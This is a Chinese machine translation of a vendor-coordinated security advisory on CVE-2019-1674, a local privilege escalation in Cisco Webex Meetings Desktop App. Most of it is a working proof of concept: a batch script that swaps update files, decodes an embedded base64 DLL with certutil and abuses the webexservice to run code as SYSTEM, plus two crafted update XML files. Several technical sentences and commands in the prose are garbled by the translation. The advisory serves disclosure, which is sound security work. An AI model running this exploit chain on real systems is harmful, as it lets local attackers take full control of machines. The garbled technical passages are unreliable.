思科webex会议桌面应用本地提权漏洞(CVE-2019-1674)

思科webex会议桌面应用本地提权漏洞(CVE-2019-1674)
Webex Meetings Desktop App 受影响的版本有
33.6.4.15, 33.6.5.2, 33.7.0.694, 33.7.1.15, 33.7.2.24, 33.7.3.7, 33.8.0.779, 33.8.1.13, 和 33.8.2.7 

安全认证-安全实验室咨询
http://www.secureauth.com/

思科webex会议桌面应用本地提权漏洞2

  1. * 咨询信息 *

标题: 思科webex会议桌面应用本地提权漏洞
咨询编号: core-2018-0012
咨询网址:
http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability-version-2
公布日期: 2019-02-27
上次更新日期: 2019-02-27
联系的供应商: 思科
发布模式: 协调发布

  1. * 漏洞信息 *

类别: os 命令注入 [cwe-78]
影响: 代码执行
远程可利用: 否
本地可利用: 是
cve 名称: cve-2019-1674

  1. * 漏洞描述 *

思科的 webex 会议网站指出, [1]:

思科 webex 会议: 简单的最佳视频会议和在线会议
加入思科 webex 会议是一件轻而易举的事, 音频和视频
清晰, 屏幕共享是比以往任何时候都容易。我们帮助您忘记技术, 专注于
重要的是什么

思科 webex 会议桌面更新服务中的漏洞
windows 应用程序可能允许本地攻击者提升权限。

  1. * 存在漏洞的版本 * 旧版本可能也会受到影响
Cisco Webex Meetings Desktop App v336415
Cisco Webex Meetings Desktop App v33652
Cisco Webex Meetings Desktop App v3370694
Cisco Webex Meetings Desktop App v337115
Cisco Webex Meetings Desktop App v337224
Cisco Webex Meetings Desktop App v33737
Cisco Webex Meetings Desktop App v3380779
Cisco Webex Meetings Desktop App v338113
Cisco Webex Meetings Desktop App v33827
  1. * 供应商信息、解决方案和变通办法 *

思科通报说, 该漏洞已在思科 webex 会议桌面应用程序版本33.6.6 和33.9.1中修复

此外, 思科还发布了以下建议:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj

  1. * 概念代码的技术说明/证明 *

7.1. * 特权升级 *

[cve-2019-1674]

思科 webex 会议桌面应用程序的更新服务为 windows
未正确验证新文件的版本号。一个没有特权的人
本地攻击者可以通过调用更新来利用此漏洞
服务命令与精心编制的参数和文件夹。这将允许
攻击者使用系统用户权限运行任意命令。

可以通过复制到本地攻击者来利用此漏洞
控制器文件夹, atgpcdecd. dll 二进制文件, 并将其重命名为 atgpcdec.dll。
然后, 必须将以前版本的 pupdate. exe 文件压缩为
7z 并复制到控制器文件夹。此外, 恶意 dll 必须是
放置在同一个文件夹中, 名为 v星期日 140. dll, 并压缩为
最后, 必须在
控制器文件夹的更新二进制文件 (ptupdate. exe), 以处理我们的
文件作为正常更新。要获得特权, 攻击者必须启动
具有命令行的服务:
sc 启动网络服务 webexservice 1 989898 “攻击者控制路径”

概念证明:

下面的概念证明执行2步攻击, 因为启动
从 3.3. x 版本, 应用程序强制检查签名
适用于所有下载的二进制文件。这2步攻击对所有
上述易受攻击的软件包。请注意, 您需要上一项
版本的 pt. update. exe 可执行文件。这些版本是:
第一步 3307.1.1811.1500, 最后一步3306.4.1811.1600
步。要利用 priot 版本到 33.8. x, 只需一个步骤
(此 poc 中的最后一步)。

批处理文件:

@echo off
REM Contents of PoC.bat
REM
REM This batch file will exploit CVE-2019-1674
REM
REM First, it will copy the atgpcdec.dll file from the installation
REM folder to the current folder as atgpcdec.7z. Then, it will backup
REM ptUpdate.exe and vcruntime140.dll files from the installation folder
REM in the current folder, adding .bak to their names. Keep in mind that
REM those files will be replaced (especially, vcruntime140.dll) and if
REM not restored, will render the application useless.
REM
REM The executable ptUpdate.exe version 3307.1.1811.1500 must be
REM compressed as ptUpdate0.7z and present in the current folder.
REM The executable ptUpdate.exe version 3306.4.1811.1600 must be
REM compressed as ptUpdate1.7z and present in the current folder.
REM Both can be generated using 7zip GUI and compressing as 7z, with
REM normal compression level and LZMA compression method.
REM Another way is to compress both files using the command line app:
REM
REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21
REM
REM ptUpdate0.xml file will be used in the first stage of the attack. It
REM will be renamed to ptUpdate.xml. Make sure to check and adjust (if
REM necessary) the "Size" and "PackagedSize" values of the xml, to the
REM ptUpdate0.7z ones. ptUpdate0.7z will be renamed to ptUpdate.7z. Then
REM the update service will be started.
REM
REM The batch will wait until the process (ptUpdate.exe) finishes
REM
REM After the first stage is completeted, it will rename ptUpdate.7z
REM back to ptUpdate0.7z, and ptUpdate.xml to ptUpdate0.xml.
REM
REM Now, ptUpdate1.xml file will be used in the second stage of the
REM attack. It will be renamed to ptUpdate.xml. Also, ptUpdate1.7z will
REM be renamed to ptUpdate.7z. Remember to check and adjust (if
REM necessary) the "Size" and "PackagedSize" values of the xml, to the
REM ptUpdate1.7z ones. Out "malicious" DLL will be generated using
REM certutil.exe and named vcruntime140.7z. It's a simple dll that will
REM execute notepad.exe on load and that has the same exported functions
REM as the original. The update service will be started again.
REM
REM The batch will wait until the process (ptUpdate.exe) finishes
REM
REM Once finished, it will print that the attack is done and wait for a
REM key press. You should see a notepad.exe (2, in fact) with SYSTEM
REM user privileges running.
REM
REM After a key is pressed, the batch will finish removing atgpcdec.7z
REM and vcruntime140.7z. Also it will rename ptUpdate.7z back to
REM ptUpdate1.7z, and ptUpdate.xml to ptUpdate1.xml.


:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)

:64BIT
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe"
ptUpdate.exe.bak
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\vcruntime140.dll"
vcruntime140.dll.bak
GOTO END

:32BIT
copy "%PROGRAMFILES%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak
copy "%PROGRAMFILES%\Webex\Webex\Applications\vcruntime140.dll"
vcruntime140.dll.bak
GOTO END

:END

ren ptUpdate0.xml ptUpdate.xml
ren ptUpdate0.7z ptUpdate.7z
SET mypath=%~dp0
sc start webexservice WebexService 1 989898 %mypath:~0,-1%

ECHO Waiting 3 seconds until ptUpdate.exe starts
Timeout /T 3 /Nobreak

:LOOP1
tasklist | find /i "ptUpdate" >nul 2>&1
IF ERRORLEVEL 1 (
  GOTO CONTINUE1
) ELSE (
  ECHO ptUpdate.exe is still running
  Timeout /T 1 /Nobreak
  GOTO LOOP1
)

:CONTINUE1

ren ptUpdate.xml ptUpdate0.xml
ren ptUpdate.7z ptUpdate0.7z
ren ptUpdate1.xml ptUpdate.xml
ren ptUpdate1.7z ptUpdate.7z

echo
N3q8ryccAARIz/fVRwYAAAAAAAB6AAAAAAAAANcfWYEAJpaOcAAX9+wFu+r0/5QBL0TuTr0Jkm3dgTnz3Weoe6NfFfEa/Y28zsBB2HEdPWzlugty+IIM4hglhy/h80OeyYw5CMe7jUK77wLPQMC9wwpT+oLYVDSuOK/v2WNuOLCpU3qtGSO+2sIFpGixpKQvLykpGOZUMczuRNNr/8Ps1lApsqe0ERm7gPGyiMqJBOCOVTC85lKIa2Cmc
> dll.txt
echo
scrjgqKPPNmbXvscJWxmvv4NtC3mLQ1KuXYBSZXmFp8dR+ZDy5znkGG/C3w0T76c4wRCfOk+/myji9luDzO2OOwp8wgpN1QeGsA4+kaZwKYTisIvPegsI2joDsLAomIh2ToXENtcOA9/11kkJy4ColEdqlXxwSW2u45ajuNDs0aAE9nbz4AWXtv/VPfc4fn3Q+mN7FTmaDUr8dxZ5V05IafOO2qTgdSHPemTasMSqYLbzA8iaxBZimokw
>> dll.txt
echo
zyzr3fwZIci+Ewzq5BnNXk+lvA30xCUYdvQuMCGkxBozk9Ec0kQ/SUixz77Nc9SbJnm0Hncff3QRRlU9ciqc6cYkQ2Cm+/dWkyDgJU+sxT9VGV+WVwNK85Q6zpPWLeVRYtk9UkxKHF0aXf3l/OgfQqtz0WSR94AF+Z9AiblDy0zOreSW8PhFbu0hfAgY1pMNC5gPNJiJ3OGwT/cLEhBPusvpfcLP3V0BwXx04T+5R7d5Rw9xWExdfCzGb
>> dll.txt
echo
Mgyijdf5nP7fv9e5V0KO8kKrGVofstVIN8FTQSMeRGYRdv9WyuLRFWbArCL86HMo5NYEwFinlqCGqnY8hZcDMPe89q1xoNlVDmDtLC+AZqEkPKuqStllzKH7qQDg7Ahe6AMtGjaT2NptL2bSBYlkfn+1iiMt5cC/inZAoZoreSpDbGb4HRcOVce7ZKeiBAFpEzM0bEXAxnbLNO0pHm0bYCftbOkffJap3m79V+Dj4t0NPgwbhYKUqk1Hi
>> dll.txt
echo
/9ebVE+IIsUlFFggilCy7BmIh3MF3Gmuhr7QLK37zV72LA0/tuDXXTWP/0EJEQ3F/v1+hSj/+HMwUBFL8xsghBfOXTpmBG6cUxK2YOwXvs/ntja2a7SWwppxtWgr4n/pxEdeezoBGl1sTZ9aIwSlu1mMehS5RYoyiSKnQfgLMsIYLqjZtc2DjUdSZDutZgC91axMjIEQ8kDIBp8dbuX4MpzNYe65OrKG/u76aemvcQ/R1QAwgTopuWgqO
>> dll.txt
echo
tJ7LIkRv406u+Qs2d5KA9+IplFV7ZL9w1zXTDTFqATROK0IKtY2MPaP5Ia0d0UFizj0I7OZSeDtZXPohMxi01xMLyqCXIQ4vaJGVneNi1SyxAJ2hV92+5sxBCOlQ+d4w19k6iJA/siz1+V0FnIrN6csCMaW6yBnR6H+jHpm2sqXf3xyU8UkCRx09LmD1lcSB3sWdc3AnoG2ijb7lD6eBdCH2OlMWceeAfOMRm48MfYW6+AcZJm9wEQ9p8
>> dll.txt
echo
irxwCQuETvGMphqzbPxFJXErhoMTxlE57+/ZLBt8F/3XAaxQnmMucvSCFMYc6Z76OCbeotPfVnPhqL+torsEaph6DFzcw3dWuFrekbLnVVFKmM/QyeZVLS18u5lY1tGRyfAUCyhPIPJvUcXFKuDYHmdT/bOnF1B/xexvtY8boRhcKiNg4JBluTMbamdoktvfWvIVGUz2m50yA0dNN06yebHietxA+IwM0zfNbqpNWJjOItsi6/27j1mE7
>> dll.txt
echo
WCgPS5tetN44WkYD28Bm+LmHwz4lbPVjAIcgZBv0OtAXJsWMUtN8Bc2z9+fVSqc7pCHGCRnYDyKm8QhcV8hU4I/M4hSN+BWYn2jGJqc42lcaMzfXrySCnF4dAtIiE1HzAwmwWAqjlVkZdFiIuQ1m+pdbx2Ipji5piYRAJtykwO0H5JThzAzJGObOMCAenaKgvgtwF97iFdBZHxuSz+3DcYF6gQupm/BxNd35l6qj19sN2qixeGJ7rQapV
>> dll.txt
echo
DJLTM5KMPdSItBNJSLLp9fuObcufi/6MBif28vemivzaWtalocJxX/MJni8PfdLYn/rLJQXmpq4Qm7z6N7FlPLtelATkMAZZ2ofaLFeBvIKzymBqtsxQAb63b+MowQvOkGAesT5JNXhoRqzOoATB9I/O7xIZu30SZwWdW85DX2MNAeB/DgzLt/c7U9A2D5vIgAEEBgABCYZHAAcLAQACIwMBAQVdABgAAAQDAwEDAQAMmACYAAAICgGcR
>> dll.txt
echo
dWGAAAFARkLAAAAAAAAAAAAAAARIwB2AGMAcgB1AG4AdABpAG0AZQAxADQAMAAuAGQAbABsAAAAGQAUCgEAkBJyInaL1AEVBgEAIAAAAAAA
>> dll.txt

certutil -decode dll.txt vcruntime140.7z

del dll.txt

SET mypath=%~dp0
sc start webexservice WebexService 1 989898 %mypath:~0,-1%

ECHO Waiting 3 seconds until ptUpdate.exe starts
Timeout /T 3 /Nobreak

:LOOP2
tasklist | find /i "ptUpdate" >nul 2>&1
IF ERRORLEVEL 1 (
  GOTO CONTINUE2
) ELSE (
  ECHO ptUpdate.exe is still running
  Timeout /T 1 /Nobreak
  GOTO LOOP2
)

:CONTINUE2

ECHO Attack done!
pause

ren ptUpdate.xml ptUpdate1.xml
ren ptUpdate.7z ptUpdate1.7z
del atgpcdec.7z
del vcruntime140.7z

ptUpdate0.xml file

<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
xmlns:com="http://www.webex.com/schemas/2002/06/common"
xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
    <serv:header></serv:header>
    <serv:body>
        <serv:bodyContent xsi:type="use:getUpdateResponse"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
            <UpdateVersionNumber>33.8.3</UpdateVersionNumber>
            <BuildNumber>33.8.3-24</BuildNumber>
            <ExternalVersionNumber>33.8.3.24</ExternalVersionNumber>
            <GPCINI>self/gpc.php</GPCINI>
            <ReleaseDate>February 2017</ReleaseDate>
            <Description>WebEx Productivity Tools 33.8.3</Description>
            <MsiLocation>msi/ptools.msi</MsiLocation>
            <UpdateFormat>binary</UpdateFormat>
            <ReleaseTrain>T32</ReleaseTrain>
            <Location>$dummy/upgradeserver/client/ptool/33.8.3</Location>
            <ControlOption>0</ControlOption>
            <WBSVERSION>33</WBSVERSION>
            <Server>myCompany.webex.com</Server>
            <UserName>MCKSysAR@myCompany.com</UserName>
            <DownloadSize>22496333</DownloadSize>
            <VersionURL/>
            <FileInfo>
                <SectionName>Installation</SectionName>
                <PackedName>ptupdate.7z</PackedName>
                <PackedNameL10N>ptupdate.7z</PackedNameL10N>
                <OrigianlName>ptupdate.exe</OrigianlName>
                <Version>3307,1,1811,1500</Version>
                <Size>1985592</Size>
                <PackagedSize>610752</PackagedSize>
                <CheckMethod>1</CheckMethod>
                <CouldIgnore>1</CouldIgnore>
                <NeedDownLoad>1</NeedDownLoad>
            </FileInfo>
            <Tools>
                <UseEmailType/>
                <Outlook>0</Outlook>
                <Notes>0</Notes>
                <UseWebExWithOffice>1</UseWebExWithOffice>
                <Excel>0</Excel>
                <PowerPoint>0</PowerPoint>
                <Word>0</Word>
                <IEShortCut>1</IEShortCut>
                <IERightMenu>0</IERightMenu>
                <UseWebExWithIM>1</UseWebExWithIM>
                <AOL>0</AOL>
                <Sametime>0</Sametime>
                <WindowsMessenger>0</WindowsMessenger>
                <Yahoo>0</Yahoo>
                <Skype>0</Skype>
                <GoogleTalk>0</GoogleTalk>
                <Firefox/>
                <IPPhone>1</IPPhone>
            </Tools>
        </serv:bodyContent>
    </serv:body>
</serv:message>
-----/

ptUpdate1.xml file:

/-----
<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
xmlns:com="http://www.webex.com/schemas/2002/06/common"
xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
    <serv:header>                                                       
    </serv:header>
    <serv:body>
        <serv:bodyContent xsi:type="use:getUpdateResponse"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
            <UpdateVersionNumber>33.8.4</UpdateVersionNumber>
            <BuildNumber>33.8.4-24</BuildNumber>
            <ExternalVersionNumber>33.8.4.24</ExternalVersionNumber>
            <GPCINI>self/gpc.php</GPCINI>
            <ReleaseDate>February 2017</ReleaseDate>
            <Description>WebEx Productivity Tools 33.8.4</Description>
            <MsiLocation>msi/ptools.msi</MsiLocation>
            <UpdateFormat>binary</UpdateFormat>
            <ReleaseTrain>T32</ReleaseTrain>
            <Location>$dummy/upgradeserver/client/ptool/33.8.4</Location>
            <ControlOption>0</ControlOption>
            <WBSVERSION>33</WBSVERSION>
            <Server>myCompany.webex.com</Server>
            <UserName>MCKSysAR@myCompany.com</UserName>
            <DownloadSize>22496333</DownloadSize>
            <VersionURL/>
            <FileInfo>
                <SectionName>Common</SectionName>
                <PackedName>vcruntime140.7z</PackedName>
                <PackedNameL10N>vcruntime140.7z</PackedNameL10N>
                <OrigianlName>vcruntime140.dll</OrigianlName>
                <Version>14,14,26405,0</Version>
                <Size>6144</Size>
                <PackagedSize>1761</PackagedSize>
                <CheckMethod>1</CheckMethod>
                <CouldIgnore>1</CouldIgnore>
                <NeedDownLoad>1</NeedDownLoad>
            </FileInfo>
            <FileInfo>
                <SectionName>Installation</SectionName>
                <PackedName>ptupdate.7z</PackedName>
                <PackedNameL10N>ptupdate.7z</PackedNameL10N>
                <OrigianlName>ptupdate.exe</OrigianlName>
                <Version>3306,4,1811,1600</Version>
                <Size>1992760</Size>
                <PackagedSize>611786</PackagedSize>
                <CheckMethod>1</CheckMethod>
                <CouldIgnore>1</CouldIgnore>
                <NeedDownLoad>1</NeedDownLoad>
            </FileInfo>
            <Tools>
                <UseEmailType/>
                <Outlook>0</Outlook>
                <Notes>0</Notes>
                <UseWebExWithOffice>1</UseWebExWithOffice>
                <Excel>0</Excel>
                <PowerPoint>0</PowerPoint>
                <Word>0</Word>
                <IEShortCut>1</IEShortCut>
                <IERightMenu>0</IERightMenu>
                <UseWebExWithIM>1</UseWebExWithIM>
                <AOL>0</AOL>
                <Sametime>0</Sametime>
                <WindowsMessenger>0</WindowsMessenger>
                <Yahoo>0</Yahoo>
                <Skype>0</Skype>
                <GoogleTalk>0</GoogleTalk>
                <Firefox/>
                <IPPhone>1</IPPhone>
            </Tools>
        </serv:bodyContent>
    </serv:body>
</serv:message>
  1. * 报告时间表 *
    2018-12-04: 安全认证向思科 psirt 发送了初步通知
    包括一份咨询草案。
    2018-12-05: 思科确认接受咨询并通报
    他们会立案的
    2018-12-07: 思科回答说, 他们能够重现
    漏洞, 他们正在制定一个计划的修复。
    2018-12-07: secureauth 感谢更新。
    2018-12-10: 思科通知 secureauth,
    修复将在2月底之前进行。
    2018-12-10: secureauth 感谢更新。
    2019-01-15: secureauth 要求思科提供更新。
    2019-01-22:secururevauth 再次要求思科进行更新。
    2019-01-22: 思科回答说, 他们仍然瞄准结束
    2月为修复的发行。
    2019-02-11: 思科确认2月27日为披露日期。
    2019-02-27: 咨询公司-2018-0012 出版。
  2. * 参考资料 *

[1] https://www.webex.com/products/video-conferencing.html